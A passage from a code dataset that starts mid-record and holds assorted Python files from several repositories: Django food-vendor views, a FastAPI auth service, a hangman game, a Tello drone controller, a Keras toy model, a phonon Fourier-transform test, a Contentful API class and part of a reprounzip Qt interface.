redirect('fooditems_by_category', fooditem.category.id)\n        else:\n            messages.error(request, 'Data already exists')\n    else:\n        form = FooditemForm()\n\n    # limit the category choices to the current vendor's categories\n    form.fields['category'].queryset = Category.objects.filter(vendor=get_vendor(request))\n    context = {'form': form}\n    return render(request, 'vendor/add-fooditem.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef Editfooditem(request, pk):\n    # fooditem = FoodItem.objects.get(id=pk)\n    fooditem = get_object_or_404(FoodItem, id=pk)\n\n    if request.method == 'POST':\n        form = FooditemForm(request.POST, request.FILES, instance=fooditem)\n        if form.is_valid():\n            food_title = form.cleaned_data['food_title']\n            fooditem = form.save(commit=False)\n            fooditem.Vendor = get_vendor(request)\n            fooditem.slug = slugify(food_title)\n            fooditem.save()\n            messages.success(request, 'Food updated successfully')\n            return redirect('fooditems_by_category', fooditem.category.id)\n        else:\n            messages.error(request, 'An error occurred while updating the food item!')\n    else:\n        form = FooditemForm(instance=fooditem)\n\n    # limit the category choices to the current vendor's categories\n    form.fields['category'].queryset = Category.objects.filter(vendor=get_vendor(request))\n    context = {\n        'form': form,\n        'fooditem': fooditem,\n    }\n    return render(request, 'vendor/edit-fooditem.html', context)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef Deletefooditem(request, pk):\n    food = FoodItem.objects.get(id=pk)\n    food.delete()\n    messages.success(request, 'Food has been deleted successfully')\n    return redirect('fooditems_by_category', food.category.id)\n\n\n@login_required(login_url='login')\n@user_passes_test(check_role_vendor)\ndef openingHours(request):\n    opening_hours = OpeningHour.objects.filter(vendor=get_vendor(request))\n    form = OpeningHourForm()\n\n    context = {\n        'form': form,\n        'opening_hours': opening_hours,\n    }\n    return render(request, 'vendor/opening_hour.html', context)\n\n\ndef openingHoursAdd(request):\n    if request.user.is_authenticated:\n        if request.headers.get('x-requested-with') == 'XMLHttpRequest' and request.method == 'POST':\n            day = request.POST.get('day')\n            from_hour = request.POST.get('from_hour')\n            to_hour = request.POST.get('to_hour')\n            is_closed = request.POST.get('is_closed')\n\n            try:\n                hour = OpeningHour.objects.create(vendor=get_vendor(request), day=day, from_hour=from_hour, to_hour=to_hour, is_closed=is_closed)\n                if hour:\n                    day = OpeningHour.objects.get(id=hour.id)\n                    if day.is_closed:\n                        response = {'status': 'success', 'id': hour.id, 'day': day.get_day_display(), 'is_closed': 'Closed'}\n                    else:\n                        response = {'status': 'success', 'id': hour.id, 'day': day.get_day_display(), 'from_hour': from_hour, 'to_hour': to_hour}\n                    return JsonResponse(response)\n\n            except IntegrityError:\n                response = {'status': 'failed', 'message': from_hour+'-'+to_hour+' already exists for this day!'}\n                return JsonResponse(response)\n\n        else:\n            return HttpResponse('Invalid request')\n    return HttpResponse('add opening hour')\n\n\ndef openingHoursEdit(request, pk):\n    pass\n\n\ndef removeopeningHours(request, pk=None):\n    if request.user.is_authenticated:\n        if request.headers.get('x-requested-with') == 'XMLHttpRequest':\n            hour = get_object_or_404(OpeningHour, pk=pk)\n            hour.delete()\n            return JsonResponse({'status': 'success', 'id': pk})\n\n\ndef OrderDetail(request, order_number):\n    try:\n        order = Order.objects.get(order_number=order_number, is_ordered=True)\n        ordered_food = 
OrderedFood.objects.filter(order=order, fooditem__Vendor=get_vendor(request))\n context ={\n 'order': order,\n 'ordered_food':ordered_food,\n 'subtotal': order.get_total_by_vendor()['subtotal'],\n 'tax_data': order.get_total_by_vendor()['tax_dict'],\n 'grand_total': order.get_total_by_vendor()['grand_total'],\n }\n return render(request, 'vendor/order_detail.html', context)\n except:\n return redirect('vendordashboard')\n \n\ndef my_orders(request):\n vendor = Vendor.objects.get(user=request.user)\n orders = Order.objects.filter(vendors__in=[vendor.id], is_ordered=True).order_by('-created_at')\n context= {\n 'orders': orders,\n }\n return render(request, 'vendor/my_orders.html', context)","repo_name":"Asoliudeen1/foodOnline","sub_path":"vendors/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18240591802","text":"import itertools\r\nfrom collections import Counter\r\n\r\ndef get_state(person):\r\n return person['state']\r\n\r\npeople = [\r\n {'name':'jaya',\r\n 'city':'tirupati',\r\n 'state':'AP'\r\n },\r\n {'name':'raj',\r\n 'city':'krishnagiri',\r\n 'state':'TN'\r\n },\r\n {'name':'sonu',\r\n 'city':'kolar',\r\n 'state':'KA'\r\n },\r\n {'name':'jaya',\r\n 'city':'tirupati',\r\n 'state':'AP'\r\n },\r\n {'name':'perumal',\r\n 'city':'krishnagiri',\r\n 'state':'TN'\r\n },\r\n {'name':'dood',\r\n 'city':'mehaboobnagar',\r\n 'state':'TLG'\r\n },\r\n {'name':'ram',\r\n 'city':'tirupati',\r\n 'state':'AP'\r\n },\r\n {'name':'lanja',\r\n 'city':'krishnagiri',\r\n 'state':'TN'\r\n },\r\n {'name':'lovely',\r\n 'city':'kolar',\r\n 'state':'KA'\r\n }\r\n ]\r\n\r\nperson_group = itertools.groupby(people,get_state)\r\nl=[]\r\nfor key,group in person_group:\r\n l.append(key)\r\n#print(l)\r\ncnt=Counter(l)\r\n#print(cnt)\r\nfor i,j in cnt.items():\r\n print(i,j)\r\n # print(i[0],i[1])\r\n #print(key)\r\n\r\n## print(key)\r\n## for per in group:\r\n## print(per,end=\"\")\r\n## print()\r\n","repo_name":"hadoopaws8/my_owned_python_programs","sub_path":"itertools1.py","file_name":"itertools1.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3564352534","text":"import os\n\nimport uvicorn\nfrom fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom AuthService.app.config import settings\nfrom AuthService.app.routers import auth, user\nfrom AuthService.auth_comm import AUTH_SERVICE_NAME\nfrom AuthService.discovery_comm import DiscoveryServiceComm\n\napp = FastAPI()\nAUTH_SERVICE_HOST = os.getenv(\"AUTH_SERVICE_HOST\", \"127.0.0.1\")\nAUTH_SERVICE_PORT = 8081\nAUTH_DISCOVERY = DiscoveryServiceComm(service_name=AUTH_SERVICE_NAME, port=str(AUTH_SERVICE_PORT),\n host=AUTH_SERVICE_HOST)\n\norigins = [\n settings.CLIENT_ORIGIN,\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\napp.include_router(auth.router, tags=['Auth'], prefix='/api/auth')\napp.include_router(user.router, tags=['Users'], prefix='/api/users')\n\n\n@app.post(\"/status\")\ndef root():\n return AUTH_DISCOVERY.get_status_data()\n\n\nif not AUTH_DISCOVERY.check_connection():\n raise Exception(\"Discovery service unavailable\")\n\nif not AUTH_DISCOVERY.register_force():\n raise Exception(f\"Registration unsuccessful, Status code:{AUTH_DISCOVERY.get_status_code()}\")\nprint(\"Registration 
successful\")\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=AUTH_SERVICE_HOST, port=AUTH_SERVICE_PORT)\n","repo_name":"GheorgheMorari/PAD","sub_path":"AuthService/auth_service_main.py","file_name":"auth_service_main.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27827482723","text":"import random\r\nimport string\r\n\r\ndef game():\r\n gameover = input('Type \"play\" to play the game, \"exit\" to quit:')\r\n if gameover == 'exit':\r\n return False\r\n elif gameover == 'play':\r\n pass\r\n else:\r\n return True \r\n print()\r\n variants = ['python', 'java', 'kotlin', 'javascript']\r\n answer = random.choice(variants)\r\n hint ='-' * len(answer)\r\n shower=list(hint)\r\n my_set=set(answer)\r\n answer_set = set()\r\n trying = 8\r\n while trying > 0:\r\n print(hint)\r\n guess = input(\"Input a letter: \")\r\n if len(guess) != 1:\r\n print(\"You should print a single letter\")\r\n print()\r\n continue\r\n if guess not in string.ascii_lowercase:\r\n print(\"It is not an ASCII lowercase letter\")\r\n print()\r\n continue\r\n if guess in answer_set:\r\n print(\"You already typed this letter\")\r\n print()\r\n continue\r\n if guess in my_set:\r\n for z in range(len(answer)):\r\n if guess == answer[z]:\r\n shower[z] = guess\r\n answer_set.add(guess)\r\n hint=''.join(shower)\r\n if hint == answer:\r\n break\r\n \r\n if guess not in my_set:\r\n print(\"No such letter in the word\")\r\n answer_set.add(guess)\r\n trying -= 1 \r\n if trying == 0:\r\n break\r\n print()\r\n if trying > 0:\r\n print(\"You guessed the word!\")\r\n print(\"You survived!\")\r\n else:\r\n print(\"You are hanged!\")\r\n print()\r\n return True\r\n \r\n \r\nprint(\"H A N G M A N\")\r\nmenu = True\r\nwhile menu == True:\r\n menu = game()\r\n","repo_name":"poznerrr/Hangman_Game_Python","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1308639754","text":"#importing libraries\nfrom djitellopy import tello\nimport keyboard as key\nfrom time import sleep\nfrom pano import pano_bridge\nimport cv2\n\n#initiating communication\ndrone = tello.Tello()\ndrone.connect()\ndrone.streamon()\n\nprint(drone.get_battery())\n\n#manual override\ndef getInput():\n lr, fb, ud, yv = 0, 0, 0, 0\n x = 60 \n #key press detection\n if key.is_pressed('left'): \n lr = -x\n elif key.is_pressed('right'): \n lr = x\n \n if key.is_pressed('up'): \n ud = x\n elif key.is_pressed('down'): \n ud = -x\n \n if key.is_pressed('w'): \n fb = x\n elif key.is_pressed(\"s\"): \n fb = -x\n \n if key.is_pressed('a'): \n yv = -x\n elif key.is_pressed('d'): \n yv = x\n \n if key.is_pressed('t'): \n drone.takeoff()\n elif key.is_pressed('l'): \n drone.land()\n \n \n return [lr, fb, ud, yv]\n\n#image capture movements\ndef right():\n drone.send_rc_control(0,0,0,35)\n sleep(2)\n ntg()\n \ndef left():\n drone.send_rc_control(0,0,0,-35)\n sleep(2)\n ntg()\n \ndef ntg():\n drone.send_rc_control(0,0,0,0)\n sleep(1)\n \n#capturing images\ndef capture(i):\n cap = drone.get_frame_read().frame\n loc1 = 'F:/Projects/droneProj/v2.0/Pano/Pics/'+str(i)+'.jpg'\n cv2.imwrite(loc1, cap)\n \ndef panorama():\n #image capture begin\n ntg()\n right()\n capture(1)\n left()\n capture(2)\n left()\n capture(3)\n right()\n ntg()\n \n #image stitch' processing\n pano_bridge()\n \ndef features():\n if key.is_pressed('P'):\n 
panorama()\n\nwhile True:\n    # manual controls\n    val = getInput()\n    drone.send_rc_control(val[0], val[1], val[2], val[3])\n\n    # feature detection\n    features()\n\n    # get frames from tello\n    frame = drone.get_frame_read().frame\n\n    # output live relay\n    cv2.imshow(\"Live Stream\", frame)\n    cv2.waitKey(1)\n","repo_name":"varunveeraa/panorama_tello","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"39226729113","text":"\"\"\"\n18th october\n---\nGiven a list, find the k-th largest element in the list.\n\nInput: list = [3, 5, 2, 4, 6, 8], k = 3\nOutput: 5\n\"\"\"\n\n\ndef find_kth_largest(nums: list, k: int) -> int:\n    highest = -1\n    while k > 0:\n        k -= 1\n        highest = max(nums)\n        nums.remove(highest)\n    return highest\n","repo_name":"nicoaravena/my-daily-solution","sub_path":"src/twenty_two/october/kth_largest_in_a_list.py","file_name":"kth_largest_in_a_list.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15309645905","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom sklearn.model_selection import train_test_split\nimport numpy\n\nnumpy.random.seed(2)\n\ndataset = numpy.loadtxt(\"DATASET.csv\", delimiter=\",\")\n\nX = dataset[:,0:2]\nY = dataset[:,2]\n\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=42)\n\nmodel = Sequential()\nmodel.add(Dense(15, input_dim=2, activation='relu'))\nmodel.add(Dense(10, activation='relu'))\nmodel.add(Dense(8, activation='relu'))\nmodel.add(Dropout(.2))\nmodel.add(Dense(1, activation='sigmoid'))\n\nmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=['accuracy'])\n\nmodel.fit(x_train, y_train, epochs=8000, batch_size=20, validation_data=(x_test, y_test))\n\nscores = model.evaluate(X, Y)\nsecondScores = model.evaluate(x_test, y_test)\n\n# compare the accuracies (index 1); evaluate() returns [loss, accuracy] lists\nif scores[1] < secondScores[1]:\n    print(\"Officials' income is likely to increase by \" + \"\\n%s: %.2f%%\" % (model.metrics_names[1], scores[1]*10))\n\nelse:\n    print(\"Officials' income is likely to decrease by \" + \"\\n%s: %.2f%%\" % (model.metrics_names[1], scores[1]*10))\n\nmodel.save('weights.h5')\n","repo_name":"Siyet/mim_hack_msk","sub_path":"neural/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19024105410","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport numpy as np\n\nimport cellconstructor as CC\nimport cellconstructor.Phonons\n\n\nimport sys, os\n\ndef test_supercell_fourier():\n\n    total_path = os.path.dirname(os.path.abspath(__file__))\n    os.chdir(total_path)\n\n\n    SUPER_DYN = \"../TestPhononSupercell/dynmat\"\n    NQIRR = 8\n    SUPERCELL = (3, 3, 2)\n\n\n    dyn = CC.Phonons.Phonons(SUPER_DYN, NQIRR)\n\n\n    fc = dyn.GetRealSpaceFC(SUPERCELL)\n    fc_new = fc.copy()\n\n\n    print(\"Real space:\")\n    print(fc[:6, :6])\n\n    print(\"First one:\")\n    print(dyn.dynmats[0])\n\n\n    print(\"Distances\")\n    super_structure = dyn.structure.generate_supercell(SUPERCELL)\n    m = super_structure.get_masses_array()\n    nq = np.prod(SUPERCELL)\n    nat_sc = dyn.structure.N_atoms * nq\n\n    _m_ = np.zeros(3*nat_sc)\n    for i in range(nat_sc):\n        _m_[3 * i : 3*i + 3] = m[i]\n\n    m_mat = np.outer(1 / np.sqrt(_m_), 1 / np.sqrt(_m_))\n\n    fc *= m_mat\n\n    
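An aside, not part of the dataset record above: the mass-weighting step just applied (fc *= m_mat) is what turns a real-space force-constant matrix into a dynamical matrix, and the eigenvalue step that follows recovers vibrational frequencies. A minimal self-contained numpy sketch of the same idea on a toy 1D two-atom chain (all masses and the spring constant are invented for illustration, not values from this test):

import numpy as np

k = 1.0                         # toy spring constant
masses = np.array([1.0, 4.0])   # toy atomic masses
fc = np.array([[k, -k],
               [-k, k]])        # 1D two-atom force-constant matrix

# divide each entry by sqrt(m_i * m_j) to build the dynamical matrix
m_mat = np.outer(1 / np.sqrt(masses), 1 / np.sqrt(masses))
dyn = fc * m_mat

w2 = np.linalg.eigvalsh(dyn)    # eigenvalues are squared frequencies
w = np.sqrt(np.abs(w2))
print(w)                        # -> [0., ~1.118]: one rigid translation, one finite mode

The zero mode is the rigid translation of the chain; the same pattern (three acoustic modes going to zero at Gamma) is what the full test below checks at scale.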
w_tot = np.sqrt(np.abs(np.real(np.linalg.eigvals(fc))))\n w_tot.sort()\n\n w_old = np.zeros(len(w_tot))\n\n for i in range(nq):\n w,p = dyn.DyagDinQ(i)\n w_old[ i * len(w) : (i+1) * len(w)] = w\n\n w_old.sort() \n print (\"Freq:\")\n print (\"\\n\".join ( [\" %.5f vs %.5f\" % (w_tot[i] * CC.Phonons.RY_TO_CM, w_old[i] * CC.Phonons.RY_TO_CM) for i in range (len(w_tot))]))\n\n\n # Try to revert the code\n\n dynmats_new = CC.Phonons.GetDynQFromFCSupercell(fc_new, np.array(dyn.q_tot), dyn.structure, super_structure)\n d2 = CC.Phonons.GetDynQFromFCSupercell_parallel(fc_new, np.array(dyn.q_tot), dyn.structure, super_structure)\n\n\n dyn_sc_new = CC.Phonons.GetSupercellFCFromDyn(dynmats_new, np.array(dyn.q_tot), dyn.structure, super_structure)\n dyn_sc_new2 = CC.Phonons.GetSupercellFCFromDyn(d2, np.array(dyn.q_tot), dyn.structure, super_structure)\n\n dist1 = np.max(np.abs(dyn_sc_new - fc_new))\n dist2 = np.max(np.abs(dyn_sc_new2 - fc_new))\n print (\"Distance reverted:\", dist1)\n print (\"Distance reverted:\", dist2)\n\n assert dist1 < 1e-10, 'Error in the fourier transform'\n assert dist2 < 1e-10, 'Error in the parallel fourier transform'\n\n #print \"\\n\".join ( [\"RATIO: %.5f \" % (w_tot[i] / w_old[i] ) for i in range (len(w_tot))])\n\n\nif __name__ == \"__main__\":\n test_supercell_fourier()\n","repo_name":"SSCHAcode/CellConstructor","sub_path":"tests/TestSupercellRealSpace/test_supercell_fourier.py","file_name":"test_supercell_fourier.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"13101871265","text":"from .resource import Resource, PublishResource, EnvironmentAwareResource\nfrom .content_type_field import ContentTypeField\nfrom .content_type_entries_proxy import ContentTypeEntriesProxy\nfrom .content_type_snapshots_proxy import ContentTypeSnapshotsProxy\nfrom .content_type_editor_interfaces_proxy import ContentTypeEditorInterfacesProxy\n\n\n\"\"\"\ncontentful_management.content_type\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThis module implements the ContentType class.\n\nAPI reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/content-types\n\n:copyright: (c) 2018 by Contentful GmbH.\n:license: MIT, see LICENSE for more details.\n\"\"\"\n\n\nclass ContentType(Resource, PublishResource, EnvironmentAwareResource):\n \"\"\"\n API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/content-types\n \"\"\"\n\n def __init__(self, item, **kwargs):\n super(ContentType, self).__init__(item, **kwargs)\n self.name = item.get('name', '')\n self.description = item.get('description', '')\n self.display_field = item.get('displayField', '')\n self.fields = [ContentTypeField(field)\n for field in item.get('fields', [])]\n\n @classmethod\n def base_url(klass, space_id, resource_id=None, public=False, environment_id=None, **kwargs):\n \"\"\"\n Returns the URI for the content type.\n \"\"\"\n\n if public:\n environment_slug = \"\"\n if environment_id is not None:\n environment_slug = \"/environments/{0}\".format(environment_id)\n return \"spaces/{0}{1}/public/content_types\".format(space_id, environment_slug)\n return super(ContentType, klass).base_url(\n space_id,\n resource_id=resource_id,\n environment_id=environment_id,\n **kwargs\n )\n\n @classmethod\n def create_attributes(klass, attributes, previous_object=None):\n \"\"\"\n Attributes for content type creation.\n \"\"\"\n\n result = super(ContentType, 
klass).create_attributes(attributes, previous_object)\n\n if 'fields' not in result:\n result['fields'] = []\n return result\n\n @classmethod\n def update_attributes_map(klass):\n \"\"\"\n Attributes for object mapping.\n \"\"\"\n\n return {\n 'name': '',\n 'description': '',\n 'display_field': '',\n 'fields': []\n }\n\n def to_json(self):\n \"\"\"\n Returns the JSON representation of the content type.\n \"\"\"\n\n result = super(ContentType, self).to_json()\n result.update({\n 'name': self.name,\n 'description': self.description,\n 'displayField': self.display_field,\n 'fields': [f.to_json() for f in self.fields]\n })\n return result\n\n def entries(self):\n \"\"\"\n Provides access to entry management methods for the given content type.\n\n API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/entries\n\n :return: :class:`ContentTypeEntriesProxy ` object.\n :rtype: contentful.content_type_entries_proxy.ContentTypeEntriesProxy\n\n Usage:\n\n >>> content_type_entries_proxy = content_type.entries()\n \n \"\"\"\n return ContentTypeEntriesProxy(self._client, self.space.id, self._environment_id, self.id)\n\n def editor_interfaces(self):\n \"\"\"\n Provides access to editor interface management methods for the given content type.\n\n API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/editor-interface\n\n :return: :class:`ContentTypeEditorInterfacesProxy ` object.\n :rtype: contentful.content_type_editor_interfaces_proxy.ContentTypeEditorInterfacesProxy\n\n Usage:\n\n >>> content_type_editor_interfaces_proxy = content_type.editor_interfaces()\n \n \"\"\"\n return ContentTypeEditorInterfacesProxy(self._client, self.space.id, self._environment_id, self.id)\n\n def snapshots(self):\n \"\"\"\n Provides access to snapshot management methods for the given content type.\n\n API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/snapshots/content-type-snapshots-collection\n\n :return: :class:`ContentTypeSnapshotsProxy ` object.\n :rtype: contentful.content_type_snapshots_proxy.ContentTypeSnapshotsProxy\n\n Usage:\n\n >>> content_type_snapshots_proxy = content_type.entries()\n \n \"\"\"\n return ContentTypeSnapshotsProxy(self._client, self.space.id, self._environment_id, self.id)\n\n def __repr__(self):\n return \"\".format(\n self.name,\n self.sys.get('id', '')\n )\n","repo_name":"contentful/contentful-management.py","sub_path":"contentful_management/content_type.py","file_name":"content_type.py","file_ext":"py","file_size_in_byte":5455,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"21"} +{"seq_id":"36468674628","text":"from typing import Tuple, List, Generator\nimport math\nfrom shapely.geometry import box\nfrom shapely.geometry.point import Point as P\n\nEARTH_RADIUS = 6373000.0\nPoint = Tuple[float, float]\nPointTuple = Tuple[Point, Point]\n\n\ndef get_segment_length(segment: PointTuple):\n\n lat1 = math.radians(segment[0][1])\n lon1 = math.radians(segment[0][0])\n lat2 = math.radians(segment[1][1])\n lon2 = math.radians(segment[1][0])\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = (math.sin(dlat / 2)) ** 2 + math.cos(lat1) * math.cos(lat2) * (math.sin(dlon / 2)) ** 2\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n return EARTH_RADIUS * c\n\n\ndef get_bb_area(bbox: PointTuple) -> float:\n origin = bbox[0]\n x = (bbox[0][0], bbox[1][1])\n y = (bbox[1][0], bbox[0][1])\n x_length = 
get_segment_length((origin, x))\n y_length = get_segment_length((origin, y))\n area = x_length * y_length / (1000 * 1000)\n return area\n\n\ndef get_bb(boxes: List[PointTuple]) -> PointTuple:\n p1 = [180, 90]\n p2 = [-180, -90]\n for box in boxes:\n if box[0][0] < p1[0]:\n p1[0] = box[0][0]\n if box[0][1] < p1[1]:\n p1[1] = box[0][1]\n if box[1][0] > p2[0]:\n p2[0] = box[1][0]\n if box[1][1] > p2[1]:\n p2[1] = box[1][1]\n return (tuple(p1), tuple(p2))\n\n\ndef subdivide_bb(bb: PointTuple, subdivide_factor: int) -> Generator[PointTuple, None, None]:\n w = (bb[1][0] - bb[0][0]) / subdivide_factor\n h = (bb[1][1] - bb[0][1]) / subdivide_factor\n for i in range(0, subdivide_factor):\n for j in range(0, subdivide_factor):\n p1 = (bb[0][0] + i * w, bb[0][1] + j * h)\n p2 = (bb[0][0] + (i + 1) * w, bb[0][1] + (j + 1) * h)\n yield (p1, p2)\n\n\ndef bb_intersects(bb1: PointTuple, bb2: PointTuple):\n \"\"\" bb2 - city\"\"\"\n sh_bb1 = box(bb1[0][0], bb1[0][1], bb1[1][0], bb1[1][1])\n sh_bb2 = P(bb2[0]) # We are checking the bottom left corner only\n return sh_bb1.touches(sh_bb2) or sh_bb1.contains(sh_bb2)\n\n\ndef get_segment_details(s: PointTuple) -> Tuple[float, float]:\n p = (s[0][0], s[1][1])\n dy = get_segment_length((s[0], p))\n dx = get_segment_length((p, s[1]))\n if s[0][0] > s[1][0]:\n dx = -dx\n if s[0][1] > s[1][1]:\n dy = -dy\n az = math.degrees(math.atan2(dy, dx))\n if az < 0:\n az = az + 180\n az = (-az + 270) % 360\n if az > 180:\n az = az - 180\n return az, get_segment_length(s)","repo_name":"sztanko/solsticestreets","sub_path":"python/solstreets/geo_utils.py","file_name":"geo_utils.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"73027335413","text":"from __future__ import division, print_function, unicode_literals\n\nimport os\n\nfrom PyQt4 import QtCore, QtGui\n\nimport reprounzip_qt.reprounzip_interface as reprounzip\nfrom reprounzip_qt.gui.common import ROOT, ResizableStack, \\\n handle_error, error_msg\n\n\nclass UnpackerOptions(QtGui.QWidget):\n def __init__(self):\n super(UnpackerOptions, self).__init__()\n self.setLayout(QtGui.QGridLayout())\n\n def add_row(self, label, widget):\n layout = self.layout()\n row = layout.rowCount()\n layout.addWidget(QtGui.QLabel(label), row, 0)\n layout.addWidget(widget, row, 1)\n\n def options(self):\n return {'args': []}\n\n\nclass DirectoryOptions(UnpackerOptions):\n def __init__(self):\n super(DirectoryOptions, self).__init__()\n self.layout().addWidget(\n QtGui.QLabel(\"(directory unpacker has no option)\"),\n 0, 0, 1, 2)\n\n\nclass ChrootOptions(UnpackerOptions):\n def __init__(self):\n super(ChrootOptions, self).__init__()\n\n self.root = QtGui.QComboBox(editable=False)\n self.root.addItems(ROOT.TEXT)\n self.add_row(\"Elevate privileges:\", self.root)\n\n self.preserve_owner = QtGui.QCheckBox(\"enabled\", tristate=True)\n self.preserve_owner.setCheckState(QtCore.Qt.PartiallyChecked)\n self.add_row(\"Preserve file ownership:\", self.preserve_owner)\n\n self.magic_dirs = QtGui.QCheckBox(\n \"mount /dev and /proc inside the chroot\", tristate=True)\n self.magic_dirs.setCheckState(QtCore.Qt.PartiallyChecked)\n self.add_row(\"Mount magic dirs:\", self.magic_dirs)\n\n def options(self):\n options = super(ChrootOptions, self).options()\n\n options['root'] = ROOT.INDEX_TO_OPTION[self.root.currentIndex()]\n\n if self.preserve_owner.checkState() == QtCore.Qt.Unchecked:\n options['args'].append('--dont-preserve-owner')\n elif 
self.preserve_owner.checkState() == QtCore.Qt.Checked:\n options['args'].append('--preserve-owner')\n\n if self.magic_dirs.checkState() == QtCore.Qt.Unchecked:\n options['args'].append('--dont-bind-magic-dirs')\n elif self.magic_dirs.checkState() == QtCore.Qt.Checked:\n options['args'].append('--bind-magic-dirs')\n\n return options\n\n\nclass DockerOptions(UnpackerOptions):\n def __init__(self):\n super(DockerOptions, self).__init__()\n\n self.root = QtGui.QComboBox(editable=False)\n self.root.addItems(ROOT.TEXT)\n self.add_row(\"Elevate privileges:\", self.root)\n\n self.image = QtGui.QLineEdit(placeholderText='detect')\n self.add_row(\"Base image:\", self.image)\n\n self.distribution = QtGui.QLineEdit(placeholderText='detect')\n self.add_row(\"Distribution:\", self.distribution)\n\n self.install_pkgs = QtGui.QCheckBox(\"install packages rather than \"\n \"extracting them from RPZ\")\n self.add_row(\"Install packages:\", self.install_pkgs)\n\n def options(self):\n options = super(DockerOptions, self).options()\n\n options['root'] = ROOT.INDEX_TO_OPTION[self.root.currentIndex()]\n\n if self.image.text():\n options['args'].extend(['--base-image', self.image.text()])\n\n if self.distribution.text():\n options['args'].extend(['--distribution',\n self.distribution.text()])\n\n if self.install_pkgs.isChecked():\n options['args'].append('--install-pkgs')\n\n return options\n\n\nclass VagrantOptions(UnpackerOptions):\n def __init__(self):\n super(VagrantOptions, self).__init__()\n\n self.image = QtGui.QLineEdit(placeholderText='detect')\n self.add_row(\"Base box:\", self.image)\n\n self.distribution = QtGui.QLineEdit(placeholderText='detect')\n self.add_row(\"Distribution:\", self.distribution)\n\n self.memory = QtGui.QSpinBox(suffix=\"MB\", minimum=99, maximum=64000,\n specialValueText=\"(default)\", value=99)\n self.add_row(\"Memory:\", self.memory)\n\n self.gui = QtGui.QCheckBox(\"Enable local GUI\")\n self.add_row(\"GUI:\", self.gui)\n\n self.use_chroot = QtGui.QCheckBox(\"use chroot and prefer packed files \"\n \"over the virtual machines' files\",\n checked=True)\n self.add_row(\"Chroot:\", self.use_chroot)\n\n self.magic_dirs = QtGui.QCheckBox(\"mount /dev and /proc inside the \"\n \"chroot\", checked=True)\n self.add_row(\"Mount magic dirs:\", self.magic_dirs)\n\n def options(self):\n options = super(VagrantOptions, self).options()\n\n if self.image.text():\n options['args'].extend(['--base-image', self.image.text()])\n\n if self.distribution.text():\n options['args'].extend(['--distribution',\n self.distribution.text()])\n\n if self.memory.value() != 99:\n options['args'].extend(['--memory', '%d' % self.memory.value()])\n\n if self.gui.isChecked():\n options['args'].append('--use-gui')\n\n if not self.use_chroot.isChecked():\n options['args'].append('--dont-use-chroot')\n\n if not self.magic_dirs.isChecked():\n options['args'].append('--dont-bind-magic-dirs')\n\n return options\n\n\nclass UnpackTab(QtGui.QWidget):\n \"\"\"The unpack window, that sets up a .RPZ file in a directory.\n \"\"\"\n UNPACKERS = [\n ('directory', DirectoryOptions),\n ('chroot', ChrootOptions),\n ('docker', DockerOptions),\n ('vagrant', VagrantOptions),\n ]\n\n unpacked = QtCore.pyqtSignal(str, object)\n\n def __init__(self, package='', **kwargs):\n super(UnpackTab, self).__init__(**kwargs)\n\n layout = QtGui.QGridLayout()\n layout.addWidget(QtGui.QLabel(\"RPZ package:\"), 0, 0)\n self.package_widget = QtGui.QLineEdit(package, enabled=False)\n layout.addWidget(self.package_widget, 0, 1)\n browse_pkg = 
